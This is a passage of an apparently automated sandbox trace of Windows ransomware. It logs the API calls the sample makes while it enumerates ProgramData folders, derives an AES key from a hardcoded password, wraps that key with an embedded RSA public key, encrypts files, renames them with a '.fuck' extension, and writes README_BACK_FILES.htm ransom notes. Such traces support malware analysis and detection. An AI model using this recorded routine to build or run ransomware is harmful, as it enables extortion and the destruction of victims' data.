users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\power_6.provxml"), bFailIfExists=0) returned 0 [0240.447] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_6.provxml", dwFileAttributes=0x0) returned 0 [0240.447] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_6.provxml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\power_6.provxml.gsg")) returned 0 [0240.448] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_6.provxml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\power_6.provxml"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_6.provxml.fuck" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\power_6.provxml.fuck")) returned 0 [0240.448] CryptDestroyHash (hHash=0x28e6e38) returned 1 [0240.448] CryptDestroyKey (hKey=0x28e6b78) returned 1 [0240.448] CryptReleaseContext (hProv=0x28f71a0, dwFlags=0x0) returned 1 [0240.448] FindNextFileA (in: hFindFile=0x28e8578, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 0 [0240.448] FindClose (in: hFindFile=0x28e8578 | out: hFindFile=0x28e8578) returned 1 [0240.449] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\readme_back_files.htm")) returned 0xffffffff [0240.449] AreFileApisANSI () returned 1 [0240.449] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f6348, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 117 [0240.449] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e474, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.449] GetLastError () returned 0x5 [0240.449] GetLastError () returned 0x5 [0240.450] FindNextFileA (in: hFindFile=0x28e84f8, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0240.450] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e59c | out: lpSystemTimeAsFileTime=0x2b9e59c) [0240.450] GetLastError () returned 0x5 [0240.450] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime.xml")) returned 0x20 [0240.458] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime.xml", dwFileAttributes=0x80) returned 0 [0240.458] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.459] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.460] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime.xml.gsg", dwFileAttributes=0x2) returned 0 [0240.460] CryptAcquireContextA (in: phProv=0x2b9d598, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d598*=0x28f6348) returned 1 [0240.462] CryptCreateHash (in: hProv=0x28f6348, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d59c | out: phHash=0x2b9d59c) returned 1 [0240.463] lstrlenA (lpString="vRgdNNYVqmqYhuRsPDBqYcdgzMlQm") returned 29 [0240.463] CryptHashData (hHash=0x28e8578, pbData=0x28cb828, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0240.463] CryptDeriveKey (in: hProv=0x28f6348, Algid=0x6610, hBaseData=0x28e8578, dwFlags=0x1000000, phKey=0x2b9d588 | out: phKey=0x2b9d588*=0x28e6e38) returned 1 [0240.463] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY------", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0240.463] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d5a4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580 | out: pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580) returned 1 [0240.463] CryptAcquireContextA (in: phProv=0x2b9d594, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d594*=0x28f7778) returned 1 [0240.463] CryptImportPublicKeyInfo (in: hCryptProv=0x28f7778, dwCertEncodingType=0x1, pInfo=0x2908198*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x29081c8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x29081d0*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d58c | out: phKey=0x2b9d58c*=0x28e6cb8) returned 1 [0240.463] CryptEncrypt (in: hKey=0x28e6cb8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d57c*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d57c*=0x80) returned 1 [0240.463] CryptEncrypt (in: hKey=0x28e6cb8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28f8080*, pdwDataLen=0x2b9d590*=0x18, dwBufLen=0x80 | out: pbData=0x28f8080*, pdwDataLen=0x2b9d590*=0x80) returned 1 [0240.464] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28f8080, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0240.464] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d5a0*=0x0, lpOverlapped=0x0) returned 0 [0240.464] CryptEncrypt (in: hKey=0x28e6e38, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x10) returned 1 [0240.464] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0240.464] CloseHandle (hObject=0xffffffff) returned 1 [0240.464] CloseHandle (hObject=0xffffffff) returned 1 [0240.464] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime.xml.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime.xml"), bFailIfExists=0) returned 0 [0240.464] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime.xml", dwFileAttributes=0x0) returned 0 [0240.465] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime.xml.gsg")) returned 0 [0240.465] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime.xml"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime.xml.fuck" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime.xml.fuck")) returned 0 [0240.466] CryptDestroyHash (hHash=0x28e8578) returned 1 [0240.466] CryptDestroyKey (hKey=0x28e6e38) returned 1 [0240.466] CryptReleaseContext (hProv=0x28f6348, dwFlags=0x0) returned 1 [0240.466] FindNextFileA (in: hFindFile=0x28e84f8, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 0 [0240.466] FindClose (in: hFindFile=0x28e84f8 | out: hFindFile=0x28e84f8) returned 1 [0240.466] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\readme_back_files.htm")) returned 0xffffffff [0240.466] AreFileApisANSI () returned 1 [0240.466] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e28c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 109 [0240.466] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e810, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.467] GetLastError () returned 0x5 [0240.467] GetLastError () returned 0x5 [0240.467] FindNextFileA (in: hFindFile=0x28e88b8, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0 [0240.467] FindClose (in: hFindFile=0x28e88b8 | out: hFindFile=0x28e88b8) returned 1 [0240.467] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\readme_back_files.htm")) returned 0xffffffff [0240.467] AreFileApisANSI () returned 1 [0240.467] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e29b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 104 [0240.467] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ebac, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.468] GetLastError () returned 0x5 [0240.468] GetLastError () returned 0x5 [0240.468] FindNextFileA (in: hFindFile=0x28bf1d8, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0 [0240.468] FindClose (in: hFindFile=0x28bf1d8 | out: hFindFile=0x28bf1d8) returned 1 [0240.468] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\readme_back_files.htm")) returned 0xffffffff [0240.468] AreFileApisANSI () returned 1 [0240.468] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2f6e78, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 65 [0240.468] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ef48, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.469] GetLastError () returned 0x5 [0240.469] GetLastError () returned 0x5 [0240.469] FindNextFileA (in: hFindFile=0x282df78, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0240.469] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\Microsoft\\Search\\*.*", lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0x28e88b8 [0240.479] FindNextFileA (in: hFindFile=0x28e88b8, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0240.480] FindNextFileA (in: hFindFile=0x28e88b8, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0240.480] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\Microsoft\\Search\\Data\\*.*", lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0xffffffff [0240.480] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Search\\Data\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\search\\data\\readme_back_files.htm")) returned 0xffffffff [0240.480] AreFileApisANSI () returned 1 [0240.480] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cd7c0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 64 [0240.480] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Search\\Data\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\search\\data\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ebac, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.481] GetLastError () returned 0x5 [0240.481] GetLastError () returned 0x5 [0240.481] FindNextFileA (in: hFindFile=0x28e88b8, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0 [0240.481] FindClose (in: hFindFile=0x28e88b8 | out: hFindFile=0x28e88b8) returned 1 [0240.481] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Search\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\search\\readme_back_files.htm")) returned 0xffffffff [0240.481] AreFileApisANSI () returned 1 [0240.481] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cd4a8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 59 [0240.481] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Search\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\search\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ef48, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.482] GetLastError () returned 0x5 [0240.482] GetLastError () returned 0x5 [0240.482] FindNextFileA (in: hFindFile=0x282df78, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0240.482] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\Microsoft\\SmsRouter\\*.*", lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0xffffffff [0240.482] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\SmsRouter\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\smsrouter\\readme_back_files.htm")) returned 0xffffffff [0240.482] AreFileApisANSI () returned 1 [0240.482] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cd100, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 62 [0240.482] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft\\SmsRouter\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\smsrouter\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ef48, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.483] GetLastError () returned 0x5 [0240.483] GetLastError () returned 0x5 [0240.483] FindNextFileA (in: hFindFile=0x282df78, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0240.483] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\Microsoft\\User Account Pictures\\*.*", lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0x28e84f8 [0240.483] FindNextFileA (in: hFindFile=0x28e84f8, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0240.483] FindNextFileA (in: hFindFile=0x28e84f8, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0240.483] FindNextFileA (in: hFindFile=0x28e84f8, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0240.483] FindNextFileA (in: hFindFile=0x28e84f8, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0240.483] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9ecd4 | out: lpSystemTimeAsFileTime=0x2b9ecd4) [0240.483] GetLastError () returned 0x5 [0240.483] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\User Account Pictures\\guest.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\guest.bmp")) returned 0x20 [0240.484] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\User Account Pictures\\guest.bmp", dwFileAttributes=0x80) returned 0 [0240.485] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\User Account Pictures\\guest.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\guest.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.485] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\User Account Pictures\\guest.bmp.gsg" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\guest.bmp.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.485] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\User Account Pictures\\guest.bmp.gsg", dwFileAttributes=0x2) returned 0 [0240.486] CryptAcquireContextA (in: phProv=0x2b9dcd0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9dcd0*=0x28f6348) returned 1 [0240.488] CryptCreateHash (in: hProv=0x28f6348, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9dcd4 | out: phHash=0x2b9dcd4) returned 1 [0240.488] lstrlenA (lpString="vRgdNNYVqmqYhuRsPDBqYcdgzMlQm") returned 29 [0240.488] CryptHashData (hHash=0x28e8638, pbData=0x2ec6c0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0240.488] CryptDeriveKey (in: hProv=0x28f6348, Algid=0x6610, hBaseData=0x28e8638, dwFlags=0x1000000, phKey=0x2b9dcc0 | out: phKey=0x2b9dcc0*=0x28e88b8) returned 1 [0240.488] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0240.488] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9dcdc, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8 | out: pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8) returned 1 [0240.488] CryptAcquireContextA (in: phProv=0x2b9dccc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9dccc*=0x28f8190) returned 1 [0240.488] CryptImportPublicKeyInfo (in: hCryptProv=0x28f8190, dwCertEncodingType=0x1, pInfo=0x29085a8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x29085d8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x29085e0*, PublicKey.cUnusedBits=0x0), phKey=0x2b9dcc4 | out: phKey=0x2b9dcc4*=0x28e6f78) returned 1 [0240.488] CryptEncrypt (in: hKey=0x28e6f78, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x80) returned 1 [0240.488] CryptEncrypt (in: hKey=0x28e6f78, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28f7bb8*, pdwDataLen=0x2b9dcc8*=0x18, dwBufLen=0x80 | out: pbData=0x28f7bb8*, pdwDataLen=0x2b9dcc8*=0x80) returned 1 [0240.489] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28f7bb8, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0240.489] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9dcd8*=0x0, lpOverlapped=0x0) returned 0 [0240.489] CryptEncrypt (in: hKey=0x28e88b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9dcd8*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9dcd8*=0x10) returned 1 [0240.489] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0240.489] CloseHandle (hObject=0xffffffff) returned 1 [0240.489] CloseHandle (hObject=0xffffffff) returned 1 [0240.489] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\User Account Pictures\\guest.bmp.gsg" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\guest.bmp.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\User Account Pictures\\guest.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\guest.bmp"), bFailIfExists=0) returned 0 [0240.497] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\User Account Pictures\\guest.bmp", dwFileAttributes=0x0) returned 0 [0240.499] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\User Account Pictures\\guest.bmp.gsg" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\guest.bmp.gsg")) returned 0 [0240.500] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\User Account Pictures\\guest.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\guest.bmp"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\User Account Pictures\\guest.bmp.fuck" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\guest.bmp.fuck")) returned 0 [0240.500] CryptDestroyHash (hHash=0x28e8638) returned 1 [0240.500] CryptDestroyKey (hKey=0x28e88b8) returned 1 [0240.500] CryptReleaseContext (hProv=0x28f6348, dwFlags=0x0) returned 1 [0240.501] FindNextFileA (in: hFindFile=0x28e84f8, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0240.501] FindNextFileA (in: hFindFile=0x28e84f8, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0240.501] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9ecd4 | out: lpSystemTimeAsFileTime=0x2b9ecd4) [0240.501] GetLastError () returned 0x5 [0240.501] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\User Account Pictures\\guest.png" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\guest.png")) returned 0x20 [0240.501] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\User Account Pictures\\guest.png", dwFileAttributes=0x80) returned 0 [0240.501] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\User Account Pictures\\guest.png" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\guest.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.502] 